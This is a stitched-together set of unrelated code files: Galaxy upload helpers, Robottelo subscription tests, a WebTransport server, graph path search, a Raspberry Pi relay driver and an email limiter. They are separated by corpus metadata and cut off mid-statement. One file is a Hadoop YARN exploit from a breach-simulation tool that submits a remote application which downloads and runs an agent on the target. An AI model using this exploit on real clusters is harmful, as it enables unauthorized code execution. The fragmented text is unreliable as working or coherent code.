file_type = "vcf_bgzip" if full_name.endswith(".vcf.gz") else "auto"
if full_name.endswith(".vcf.gz"):
full_name = full_name.replace(".vcf.gz", ".vcf")
for item in libitems:
if item["name"] == full_name:
return item
logger.info("Uploading to Galaxy library '%s': %s" % (library.name, full_name))
return gi.libraries.upload_from_galaxy_filesystem(str(library.id), fname, folder_id=str(folder["id"]),
link_data_only="link_to_files",
dbkey=sample_info["genome_build"],
file_type=file_type,
roles=str(library.roles) if library.roles else None)
def _get_folder(gi, folder_name, library, libitems):
"""Retrieve or create a folder inside the library with the specified name.
"""
for item in libitems:
if item["type"] == "folder" and item["name"] == "/%s" % folder_name:
return item
return gi.libraries.create_folder(library.id, folder_name)[0]
# Minimal record of a Galaxy data library: its API id, display name and the
# role (user/group id) granted access to it.
GalaxyLibrary = collections.namedtuple("GalaxyLibrary", ["id", "name", "roles"])
def _get_library(gi, sample_info, config):
"""Retrieve the appropriate data library for the current user.
"""
galaxy_lib = sample_info.get("galaxy_library",
config.get("galaxy_library"))
role = sample_info.get("galaxy_role",
config.get("galaxy_role"))
if galaxy_lib:
return _get_library_from_name(gi, galaxy_lib, role, sample_info, create=True)
elif config.get("private_libs") or config.get("lab_association") or config.get("researcher"):
return _library_from_nglims(gi, sample_info, config)
else:
raise ValueError("No Galaxy library specified for sample: %s" %
sample_info["description"])
def _get_library_from_name(gi, name, role, sample_info, create=False):
    """Find an existing (non-deleted) Galaxy library by name.

    :param create: when True, create and permission the library if missing
    :return: GalaxyLibrary namedtuple
    :raises ValueError: when the library is absent and create is False
    """
    for lib in gi.libraries.get_libraries():
        if lib["name"].lower() == name.lower() and not lib.get("deleted", False):
            return GalaxyLibrary(lib["id"], lib["name"], role)
    if create and name:
        logger.info("Creating Galaxy library: '%s'" % name)
        lib = gi.libraries.create_library(name)
        librole = str(gi.users.get_current_user()["id"] if not role else role)
        try:
            gi.libraries.set_library_permissions(str(lib["id"]), librole, librole, librole, librole)
        # XXX Returns error on Galaxy side but seems to work -- ugly
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are no longer swallowed; the best-effort behavior is kept.
        except Exception:
            pass
        return GalaxyLibrary(lib["id"], lib["name"], role)
    else:
        raise ValueError("Could not find Galaxy library matching '%s' for sample %s" %
                         (name, sample_info["description"]))
def _library_from_nglims(gi, sample_info, config):
"""Retrieve upload library from nglims specified user libraries.
"""
names = [config.get(x, "").strip() for x in ["lab_association", "researcher"]
if config.get(x)]
for name in names:
for ext in ["sequencing", "lab"]:
check_name = "%s %s" % (name.split()[0], ext)
try:
return | _get_l | ibrary_from_name(gi, check_name, None, sample_info)
except ValueError:
pass
check_names = set([x.lower() for x in names])
for libname, role in config["private_libs"]:
# Try to find library for lab or rsearcher
if libname.lower() in check_names:
return _get_library_from_name(gi, libname, role, sample_info)
# default to first private library if available
if len(config.get("private_libs", [])) > 0:
libname, role = config["private_libs"][0]
return _get_library_from_name(gi, libname, role, sample_info)
# otherwise use the lab association or researcher name
elif len(names) > 0:
return _get_library_from_name(gi, names[0], None, sample_info, create=True)
else:
raise ValueError("Could not find Galaxy library for sample %s" % sample_info["description"])
|
pez2001/sVimPy | test_scripts/test53.py | Python | gpl-2.0 | 33 | 0.060606 | a = {i*i for | i in (1,2)}
print | (a) |
sghai/robottelo | tests/foreman/cli/test_subscription.py | Python | gpl-3.0 | 28,458 | 0 | """Test class for Subscriptions
:Requirement: Subscription
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: CLI
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import tempfile
import csv
import os
from robottelo import manifests
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.csv_ import CSV_
from robottelo.cli.factory import (
activationkey_add_subscription_to_repo,
make_activation_key,
make_lifecycle_environment,
make_org,
setup_org_for_a_rh_repo,
)
from robottelo.cli.host import Host
from robottelo.cli.repository import Repository
from robottelo.cli.repository_set import RepositorySet
from robottelo.cli.subscription import Subscription
from robottelo.constants import (
PRDS,
REPOS,
REPOSET,
DEFAULT_SUBSCRIPTION_NAME,
SATELLITE_SUBSCRIPTION_NAME,
)
from robottelo.decorators import (
run_in_one_thread,
skip_if_bug_open,
tier1,
tier2,
tier3,
upgrade
)
from robottelo.ssh import download_file, upload_file
from robottelo.test import CLITestCase
from robottelo.vm import VirtualMachine
@run_in_one_thread
class SubscriptionTestCase(CLITestCase):
| """Manifest CLI tests"""
def setUp( | self):
"""Tests for content-view via Hammer CLI"""
super(SubscriptionTestCase, self).setUp()
self.org = make_org()
# pylint: disable=no-self-use
def _upload_manifest(self, org_id, manifest=None):
"""Uploads a manifest into an organization.
A cloned manifest will be used if ``manifest`` is None.
"""
if manifest is None:
manifest = manifests.clone()
self.upload_manifest(org_id, manifest)
@staticmethod
def _read_csv_file(file_path):
"""Read a csv file as a dictionary
:param str file_path: The file location path to read as csv
:returns a tuple (list, list[dict]) that represent field_names, data
"""
csv_data = []
with open(file_path, 'r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
field_names = csv_reader.fieldnames
for csv_row in csv_reader:
csv_data.append(csv_row)
return field_names, csv_data
@staticmethod
def _write_csv_file(file_path, filed_names, csv_data):
"""Write to csv file
:param str file_path: The file location path to write as csv
:param list filed_names: The field names to be written
:param list[dict] csv_data: the list dict data to be saved
"""
with open(file_path, 'w') as csv_file:
csv_writer = csv.DictWriter(csv_file, filed_names, delimiter=',')
csv_writer.writeheader()
for csv_row in csv_data:
csv_writer.writerow(csv_row)
    @tier1
    def test_positive_manifest_upload(self):
        """upload manifest

        :id: e5a0e4f8-fed9-4896-87a0-ac33f6baa227

        :expectedresults: Manifest are uploaded properly

        :CaseImportance: Critical
        """
        self._upload_manifest(self.org['id'])
        # Listing subscriptions only succeeds if the manifest import worked.
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
    @tier1
    @upgrade
    def test_positive_manifest_delete(self):
        """Delete uploaded manifest

        :id: 01539c07-00d5-47e2-95eb-c0fd4f39090f

        :expectedresults: Manifest are deleted properly

        :CaseImportance: Critical
        """
        self._upload_manifest(self.org['id'])
        # Subscriptions are visible right after the upload ...
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
        Subscription.delete_manifest({
            'organization-id': self.org['id'],
        })
        # ... and listing still succeeds (without error) after deletion.
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
    @tier2
    @upgrade
    def test_positive_enable_manifest_reposet(self):
        """enable repository set

        :id: cc0f8f40-5ea6-4fa7-8154-acdc2cb56b45

        :expectedresults: you are able to enable and synchronize repository
            contained in a manifest

        :CaseLevel: Integration

        :CaseImportance: Critical
        """
        self._upload_manifest(self.org['id'])
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
        # Enable a Red Hat Virtualization repository delivered by the manifest ...
        RepositorySet.enable({
            'basearch': 'x86_64',
            'name': REPOSET['rhva6'],
            'organization-id': self.org['id'],
            'product': PRDS['rhel'],
            'releasever': '6Server',
        })
        # ... and prove it is usable by synchronizing its content.
        Repository.synchronize({
            'name': REPOS['rhva6']['name'],
            'organization-id': self.org['id'],
            'product': PRDS['rhel'],
        })
    @tier1
    def test_positive_manifest_history(self):
        """upload manifest and check history

        :id: 000ab0a0-ec1b-497a-84ff-3969a965b52c

        :expectedresults: Manifest history is shown properly

        :CaseImportance: Critical
        """
        self._upload_manifest(self.org['id'])
        # NOTE(review): sibling tests pass per_page=False here; per_page=None
        # looks inconsistent -- confirm whether that is intentional.
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=None,
        )
        history = Subscription.manifest_history({
            'organization-id': self.org['id'],
        })
        # The import event is recorded against the organization name.
        self.assertIn(
            '{0} file imported successfully.'.format(self.org['name']),
            ''.join(history),
        )
    @tier1
    @upgrade
    def test_positive_manifest_refresh(self):
        """upload manifest and refresh

        :id: 579bbbf7-11cf-4d78-a3b1-16d73bd4ca57

        :expectedresults: Manifests can be refreshed

        :CaseImportance: Critical
        """
        # Refresh requires the original (non-cloned) manifest.
        self._upload_manifest(
            self.org['id'], manifests.original_manifest())
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
        Subscription.refresh_manifest({
            'organization-id': self.org['id'],
        })
        # Clean up so the shared original manifest is released for other tests.
        Subscription.delete_manifest({
            'organization-id': self.org['id'],
        })
    @skip_if_bug_open('bugzilla', 1226425)
    @tier1
    def test_negative_manifest_refresh(self):
        """manifest refresh must fail with a cloned manifest

        :id: 7f40795f-7841-4063-8a43-de0325c92b1f

        :expectedresults: the refresh command returns a non-zero return code

        :BZ: 1226425

        :CaseImportance: Critical
        """
        # A cloned manifest cannot be refreshed against the upstream portal.
        self._upload_manifest(self.org['id'])
        Subscription.list(
            {'organization-id': self.org['id']},
            per_page=False,
        )
        with self.assertRaises(CLIReturnCodeError):
            Subscription.refresh_manifest({
                'organization-id': self.org['id'],
            })
@tier3
def test_positive_restore_ak_and_content_hosts_subscriptions(self):
"""Restore activation key and content hosts subscriptions
:id: a44fdeda-9c8c-4316-85b4-a9b6b9f1ffdb
:customerscenario: true
:steps:
1. Setup activation key , lifecycle environment and content view
with RH repository
2. Add RH subscription to activation key
3. Setup hosts (minimum two) and subscribe them to activation key
4. Attach RH subscription to the created content hosts
5. export the activation key and content hosts subscriptions
6. Delete the subscription manifest
7. Ensure that the activation key and content hosts subscriptions
does not exist
8. Upload the subscription manifest
9. Ensure the activation key and content hosts subscriptions does
not exist
10. Restore the activation key and content hosts subscriptions
:expectedresults: activation key and content hosts subscriptions
restored
:CaseImportance: Critical
"""
lce = make_lifecycle_environment({'organization-id': self.org['id']})
activation_key = make_activation_key({
'organization-id': self.org['id'],
'lif |
beaufortfrancois/samples | webtransport/webtransport_server.py | Python | apache-2.0 | 9,308 | 0.000215 | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example WebTransport over HTTP/3 server based on the aioquic library.
Processes incoming streams and datagrams, and
replies with the ASCII-encoded length of the data sent in bytes.
Example use:
python3 webtransport_server.py certificate.pem certificate.key
Example use from JavaScript:
let transport = new WebTransport("https://localhost:4433/counter");
await transport.ready;
let stream = await transport.createBidirectionalStream();
let encoder = new TextEncoder();
let writer = stream.writable.getWriter();
await writer.write(encoder.encode("Hello, world!"))
writer.close();
console.log(await new Response(stream.readable).text());
This will output "13" (the length of "Hello, world!") into the console.
"""
# ---- Dependencies ----
#
# This server only depends on Python standard library and aioquic 0.9.15 or
# later. See https://github.com/aiortc/aioquic for instructions on how to
# install aioquic.
#
# ---- Certificates ----
#
# HTTP/3 always operates using TLS, meaning that running a WebTransport over
# HTTP/3 server requires a valid TLS certificate. The easiest way to do this
# is to get a certificate from a real publicly trusted CA like
# <https://letsencrypt.org/>.
# https://developers.google.com/web/fundamentals/security/encrypt-in-transit/enable-https
# contains a detailed explanation of how to achieve that.
#
# As an alternative, Chromium can be instructed to trust a self-signed
# certificate using command-line flags. Here are step-by-step instructions on
# how to do that:
#
# 1. Generate a certificate and a private key:
# openssl req -newkey rsa:2048 -nodes -keyout certificate.key \
# -x509 -out certificate.pem -subj '/CN=Test Certificate' \
# -addext "subjectAltName = DNS:localhost"
#
# 2. Compute the fingerprint of the certificate:
# openssl x509 -pubkey -noout -in certificate.pem |
# openssl rsa -pubin -outform der |
# openssl dgst -sha256 -binary | base64
# The result should be a base64-encoded blob that looks like this:
# "Gi/HIwdiMcPZo2KBjnstF5kQdLI5bPrYJ8i3Vi6Ybck="
#
# 3. Pass a flag to Chromium indicating what host and port should be allowed
# to use the self-signed certificate. For instance, if the host is
# localhost, and the port is 4433, the flag would be:
# --origin-to-force-quic-on=localhost:4433
#
# 4. Pass a flag to Chromium indicating which certificate needs to be trusted.
# For the example above, that flag would be:
# --ignore-certificate-errors-spki-list=Gi/HIwdiMcPZo2KBjnstF5kQdLI5bPrYJ8i3Vi6Ybck=
#
# See https://www.chromium.org/developers/how-tos/run-chromium-with-flags for
# details on how to run Chromium with flags.
import argparse
import asyncio
import logging
from collections import defaultdict
from typing import Dict, Optional
from aioquic.asyncio import QuicConnectionProtocol, serve
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import stream_is_unidirectional
from aioquic.quic.events import ProtocolNegotiated, StreamReset, QuicEvent
BIND_ADDRESS = '::1'
BIND_PORT = 4433
logger = logging.getLogger(__name__)
# CounterHandler implements a really simple protocol:
# - For every incoming bidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on the same stream.
# - For every incoming unidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on a new unidirectional stream.
# - For every incoming datagram, it sends a datagram with the length of
# datagram that was just received.
class CounterHandler:
    """Byte-counting WebTransport session handler.

    Replies with the ASCII-encoded number of bytes received:
    - bidirectional stream: reply on the same stream once it ends
    - unidirectional stream: reply on a fresh unidirectional stream
    - datagram: reply with a datagram
    """

    def __init__(self, session_id, http: H3Connection) -> None:
        self._session_id = session_id
        self._http = http
        self._counters = defaultdict(int)

    def h3_event_received(self, event: H3Event) -> None:
        if isinstance(event, DatagramReceived):
            # Echo back the size of the datagram we just received.
            payload = str(len(event.data)).encode('ascii')
            self._http.send_datagram(self._session_id, payload)
        if isinstance(event, WebTransportStreamDataReceived):
            self._counters[event.stream_id] += len(event.data)
            if event.stream_ended:
                self._reply_with_count(event.stream_id)

    def _reply_with_count(self, stream_id) -> None:
        # Unidirectional requests get their reply on a new unidirectional
        # stream; bidirectional ones are answered on the same stream.
        if stream_is_unidirectional(stream_id):
            response_id = self._http.create_webtransport_stream(
                self._session_id, is_unidirectional=True)
        else:
            response_id = stream_id
        payload = str(self._counters[stream_id]).encode('ascii')
        self._http._quic.send_stream_data(
            response_id, payload, end_stream=True)
        self.stream_closed(stream_id)

    def stream_closed(self, stream_id: int) -> None:
        # Drop the per-stream counter; tolerate streams we never saw data on.
        self._counters.pop(stream_id, None)
# WebTransportProtocol handles the beginning of a WebTransport connection: it
# responses to an extended CONNECT method request, and routes the transport
# events to a relevant handler (in this example, CounterHandler).
class WebTransportProtocol(QuicConnectionProtocol):
    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        # HTTP/3 layer; created once ALPN negotiation selects H3.
        self._http: Optional[H3Connection] = None
        # Per-session WebTransport handler; set after the CONNECT handshake.
        self._handler: Optional[CounterHandler] = None
    def quic_event_received(self, event: QuicEvent) -> None:
        """Handle a raw QUIC event, then forward it through the HTTP/3 layer."""
        if isinstance(event, ProtocolNegotiated):
            self._http = H3Connection(self._quic, enable_webtransport=True)
        elif isinstance(event, StreamReset) and self._handler is not None:
            # Streams in QUIC can be closed in two ways: normal (FIN) and
            # abnormal (resets). FIN is handled by the handler; the code
            # below handles the resets.
            self._handler.stream_closed(event.stream_id)
        if self._http is not None:
            # Feed every QUIC event into the H3 layer and dispatch whatever
            # HTTP/3-level events it produces.
            for h3_event in self._http.handle_event(event):
                self._h3_event_received(h3_event)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
headers = {}
for header, value in event.headers:
headers[header] = value
if (headers.get(b":method") == b"CONNECT" and
headers.get(b":protocol") == b"webtransport"):
self._handshake_webtransport(event.stream_id, headers)
else:
self._send_response(event.stream_id, 400, end_stream=True)
if self._handler:
self._handler.h3_event_received(event)
def _handshake_webtransport(self,
stream_id: int,
request_headers: Dict[bytes, bytes]) -> None:
authority = request_headers.get(b":authori | ty")
path = request_headers.get(b":path")
if authority is Non | e or path is None:
# `:authority` and `:path` must be provided.
self._send_response(stream_id, 400, end_stream=True)
return
if path == b"/counter":
assert(self._handler is None)
self._handler = CounterHandler(stream_id, self._http)
self._send_response(stream_id, 200)
else:
self._send_response(stream_id, |
Nithanaroy/GeoReachPaths | Naive.py | Python | apache-2.0 | 9,722 | 0.003394 | import time, heapq
from itertools import count
import networkx as nx
from pymongo import MongoClient
from Common import MONGO_URL, USER_NODE_PREFIX, BUSINESS_NODE_PREFIX, construct_graph, path_length
def topk_naive2(G, s, R, K):
    """
    Finds all businesses in the region and returns the K nearest by path length.
    Runs one single-source Dijkstra from s, then looks up each business
    returned by the spatial (R-Tree backed) range query.
    :param G: NetworkX Graph instance
    :param s: Source vertex's ID as a string or number that can be found in G
    :param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
    :param K: Number of shortest paths to compute
    :return: list of up to K tuples (distance from s, path from s, business node)
    """
    candidates = business_in_loc(R[0], R[1], R[2], R[3])
    length, path = nx.single_source_dijkstra(G, s)
    results = []
    for biz_id in candidates:
        node = BUSINESS_NODE_PREFIX + biz_id
        if node in length:
            results.append((length[node], path[node], node))
        else:
            # Business not reachable from s.
            results.append((float("inf"), [], node))
    results.sort()
    return results[:K]
def topk_naive3(G, source, R, K):
    """
    Traverses the graph using Dijkstra's and stops once K nodes are found in R
    No spatial index is used
    :param G: NetworkX Graph instance
    :param source: Source vertex's ID as a string or number that can be found in G
    :param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
    :param K: Number of shortest paths to compute
    :return: tuple (vertices in R ordered by distance, distance dict, path dict)
    """
    start = time.time()  # retained for the commented-out timing diagnostic below
    paths = {source: [source]}
    dist = {}  # dictionary of final (settled) distances
    seen = {source: 0}  # intermediate distances from source
    c = count()  # tie-breaker so the heap never compares vertex labels
    fringe = []  # use heapq with (distance,label) tuples
    nearest_vertices = []  # vertices that fall in R sorted by distance from source
    heapq.heappush(fringe, (0, next(c), source))
    while fringe:
        (d, _, v) = heapq.heappop(fringe)
        if v in dist:
            continue  # already searched this node.
        dist[v] = d
        if _vertex_lies_in(G, v, R):  # if v lies in the given region R
            nearest_vertices.append(v)  # collect the vertex
            if len(nearest_vertices) == K:  # if K vertices are collected
                break  # stop Dijkstra's
        # Relax all outgoing edges of the settled vertex.
        for u, e in G.succ[v].items():
            vu_dist = dist[v] + e.get('weight')
            if u not in seen or vu_dist < seen[u]:
                seen[u] = vu_dist
                heapq.heappush(fringe, (vu_dist, next(c), u))
                if paths is not None:
                    paths[u] = paths[v] + [u]
    # print "After %ss: Found topK" % (time.time() - start,)
    return nearest_vertices, dist, paths
def _vertex_lies_in(G, v, R):
"""
Checks if vertex v lies in region R
:param G: NetworkX Graph instance
:param v: any vertex in the Graph
:param R: list of co-ordinates (nelat, nelong, swlat, swlong)
:return: True if v lies in R, else False
"""
if 'spatial' in G.node[v]:
lat = G.node[v]['spatial']['lat']
lng = G.node[v]['spatial']['lng']
return R[2] <= lat <= R[0] and R[3] <= lng <= R[1]
return False
class TopKNaive4:
    """
    Uses A* with landmarks to find the shortest paths between s and all
    vertices in R, then picks the top-k from them.
    """

    def __init__(self, G, resolution):
        """
        Constructor
        :param G: NetworkX directed graph instance
        :param resolution: resolution used in the spatial index - GeoReachPaths
        """
        self.G = G
        self.resolution = resolution
        self.index = self._landmark_index()

    def run(self, s, R, K):
        """
        Finds the K nearest businesses in region R from source s using A*
        guided by the landmark heuristic.
        Requires MongoDB to perform the spatial range query for R.
        :param s: source vertex
        :param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
        :param K: Number of shortest paths to compute
        :return: list of up to K tuples (distance from s, path from s, business node)
        """
        region_biz = business_in_loc(R[0], R[1], R[2], R[3])
        results = []
        for biz_id in region_biz:
            node = BUSINESS_NODE_PREFIX + biz_id
            try:
                shortest = nx.astar_path(self.G, s, node, self._heuristic)
                results.append((path_length(self.G, shortest), shortest, node))
            except nx.NetworkXNoPath:
                # Business not reachable from s.
                results.append((float("inf"), [], node))
        results.sort()
        return results[:K]

    def _landmark_index(self):
        """
        Builds the landmark index: for each selected landmark, the shortest
        path lengths to all vertices reachable from it.
        :return: {landmark1: {v1: 5, v2: 10, ...}, landmark2: {v1: 4, v2: 15}}
        """
        return {
            landmark: nx.single_source_dijkstra_path_length(self.G, landmark)
            for landmark in self._pick_landmarks(self.resolution)
        }

    @staticmethod
    def _pick_landmarks(resolution):
        """
        Returns the precomputed list of landmarks for the given resolution.
        :param resolution: resolution used in spatial index
        :return: [landmark1, landmark2]
        """
        landmarks = {5: ["Umng_wOkmTMboTVon340-xw"], 25: ["Umng_wOkmTMboTVon340-xw"], 125: ["Umng_wOkmTMboTVon340-xw"],
                     625: ["Umng_wOkmTMboTVon340-xw"],
                     3125: ['Umng_wOkmTMboTVon340-xw', 'UVcnb1imy3F_zNXkIA4tsvg', 'BQkttdZaXAt5csTYffJvVfg',
                            'UTyjPzE9tphy-m_khJe8SrQ', 'UWuXYZoRLG4_EKD4jdk1WuA', 'UWrHzMQEVgjklCckIVHogQg']}
        return landmarks[resolution]  # ideally we should have computed this piece

    def _heuristic(self, u, v):
        """
        Returns a landmark-based lower bound on the distance from u to v.
        :return: x where distance(u to v) >= x
        """
        bounds = [
            dists[v] - dists[u]
            for dists in self.index.values()
            if v in dists and u in dists
        ]
        # Never return a negative bound; 0 is always admissible.
        bounds.append(0)
        return max(bounds)
def topk_naive(G, s, R, K):
"""
finds all business in the region and ret | urns an iterator of K shortest paths
for each business in t | he region filtered by an RTree, find the shortest path from source
:param G: NetworkX Graph instance
:param s: Source vertex's ID as a string or number that can be found in G
:param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
:param K: Number of shortest paths to compute
Iterator of tuples (distance from s, path from s)
"""
start = time.time()
print '\nStarted Algorithm at %s' % (start,)
biz = business_in_loc(R[0], R[1], R[2], R[3])
print 'After %ss: Found %s businesses in the region %s' % (time.time() - start, len(biz), R)
res = []
s = USER_NODE_PREFIX + s
for b in biz:
b = BUSINESS_NODE_PREFIX + b
length, path = nx.single_source_dijkstra(G, s, b)
try:
res.append((length[b], path[b], b))
except KeyError:
# This business is not reachable from s
res.append((float("inf"), [], b))
print 'After %ss: Found shortest path from %s to %s' % (time.time() - start, s, b)
res.sort()
return res[:K]
def business_in_loc(nelat, nelong, swlat, swlong):
"""
Finds businesses in a given region
:param nelat: Latitude of the northeast coordinate
:param nelong: Longitude of the northeast coordinate
:param swlat: Latitude of the southwest coordinate
:param swlong: Longitude of the southwest coordinate
:return: a |
mecworks/garden_pi | common/relay.py | Python | mit | 2,522 | 0.002379 | #!/usr/bin/env python
# A Raspberry Pi GPIO based relay device
import RPi.GPIO as GPIO
from common.adafruit.Adafruit_MCP230xx.Adafruit_MCP230xx import Adafruit_MCP230XX
class Relay(object):
_mcp23017_chip = {} # Conceivably, we could have up to 8 of these as there are a possibility of 8 MCP chips on a bus.
def __init__(self, mcp_pin, i2c_address=0x27):
"""
Initialize a relay
:param mcp_pin: BCM gpio number that is connected to a relay
:return:
"""
self.ON = 0
self.OFF = 1
self._i2c_address = i2c_address
self._mcp_pin = mcp_pin
if GPIO.RPI_REVISION == 1:
i2c_busnum = 0
else:
i2c_busnum = 1
if not self._mcp23017_chip.has_key(self._i2c_address):
self._mcp23017_chip[self._i2c_address] = Adafruit_MCP230XX(busnum=i2c_busnum, address=self._i2c_address, num_gpios=16)
self._relay = self._mcp23017_chip[self._i2c_address]
self._relay.config(self._mcp_pin, self._relay.OUTPUT)
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
def set_state(self, state):
"""
Set the state of the relay. relay.ON, relay.OFF
:param state:
:return:
"""
if state == self.ON:
self._relay.output(self._mcp_pin, self.ON)
self.state = self.ON
elif state == self.OFF:
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
def toggle(self):
"""
Toggle the state of a relay
:return:
"""
if self.state == self.ON:
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
else:
self._relay.output(self._mcp_pin, self.ON)
self.state = self.ON
def get_state(self):
return self.state
if __name__ == '__main__':
import time
pause = . | 15
for pin in range(16):
print("Pin: %s" % pin)
r = Relay(pin)
r.set_state(r.ON)
time.sleep(pause)
r.set_state(r.OFF)
time.sleep(pause)
r.toggle()
time.sleep(pause)
r.toggle()
time.sleep(pause)
r1 = Relay(10)
r2 = Relay(2)
r3 = Relay(15)
r1.set_state(r1.ON)
print(r1._mcp_pin)
r2.set_state(r2. | ON)
print(r2._mcp_pin)
r3.set_state(r3.ON)
print(r3._mcp_pin)
time.sleep(1)
r1.set_state(r1.OFF)
r2.set_state(r2.OFF)
r3.set_state(r3.OFF) |
guardicore/monkey | monkey/infection_monkey/exploit/hadoop.py | Python | gpl-3.0 | 4,087 | 0.001223 | """
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
import posixpath
import string
from random import SystemRandom
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import (
HADOOP_LINUX_COMMAND,
HADOOP_WINDOWS_COMMAND,
ID_STRING,
MONKEY_ARG,
)
from infection_monkey.utils.commands import build_monkey_commandline
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Hadoop"
HADOOP_PORTS = [("8088", False)]
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
RAN_STR_LEN = 6
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def _exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
# We presume hadoop works only on 64-bit machines
if self.host.os["type"] == "windows":
self.host.os["machine"] = " | 64"
paths = self.get_mon | key_paths()
if not paths:
return False
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
command = self.build_command(paths["dest_path"], http_path)
if not self.exploit(self.vulnerable_urls[0], command):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
self.add_executed_cmd(command)
return True
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
# Create a random name for our application in YARN
safe_random = SystemRandom()
rand_name = ID_STRING + "".join(
[safe_random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
def check_if_exploitable(self, url):
try:
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT,
)
except requests.ConnectionError:
return False
return resp.status_code == 200
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
else:
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type": "YARN",
}
return payload
|
palette-software/palette | controller/controller/email_limit.py | Python | gpl-3.0 | 4,376 | 0.001371 | """ Email limiter """
import logging
from sqlalchemy import Column, BigInteger, DateTime, func
from sqlalchemy.schema import ForeignKey
import akiri.framework.sqlalchemy as meta
from event_control import EventControl
from manager import Manager
from system import SystemKeys
logger = logging.getLogger()
class EmailLimitEntry(meta.Base):
# pylint: disable=no-init
__tablename__ = "email_sent"
emailid = Column(BigInteger, unique=True, nullable=False,
autoincrement=True, primary_key=True)
envid = Column(BigInteger, ForeignKey("environment.envid"))
eventid = Column(BigInteger) # Just kept to help. Not required.
creation_time = Column(DateTime, server_default=func.now())
@classmethod
def remove_all(cls, envid):
session = meta.Session()
session.query(EmailLimitEntry).\
filter(EmailLimitEntry.envid == envid).\
delete()
session.commit()
class EmailLimitManager(Manager):
""" Ensures that email is no | t sent too frequently. """
def _log_email(self, eventid):
session = meta.Session()
entry = EmailLimitEntry(envid=self.envid, eventid=eventid)
session.add(entry)
session.commit()
def _prune(self):
"""Keep only the the ones in the last email-lookback-minutes
period."""
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
stmt = ("DELETE from email_sent "
| "where creation_time < NOW() - INTERVAL '%d MINUTES'") % \
(email_lookback_minutes,)
connection = meta.get_connection()
result = connection.execute(stmt)
connection.close()
logger.debug("email limit manager: pruned %d", result.rowcount)
def _recent_count(self):
return meta.Session.query(EmailLimitEntry).\
filter(EmailLimitEntry.envid == self.envid).\
count()
def email_limit_reached(self, event_entry, eventid):
"""Keep track of how many emails have been sent during the last
email-lookback-minutes period and check to see if
email-max-count have already been sent. Return:
count-of-emails-sent-recently: if email_limit reached
reached (don't send more
emails).
False if email-limit hasn't been reached (keep sending emails).
"""
logger.debug("email_limit_reached checking: event %s, eventid %s\n",
event_entry.key, eventid)
# We limit only ERROR events.
